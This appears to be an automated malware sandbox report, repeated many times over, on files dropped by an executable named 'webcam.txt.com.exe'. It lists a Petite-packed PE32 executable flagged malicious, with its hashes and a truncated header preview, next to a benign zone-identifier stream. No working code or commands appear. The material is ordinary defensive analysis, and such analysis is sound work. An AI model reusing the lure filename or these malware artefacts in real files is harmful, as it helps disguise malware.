                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
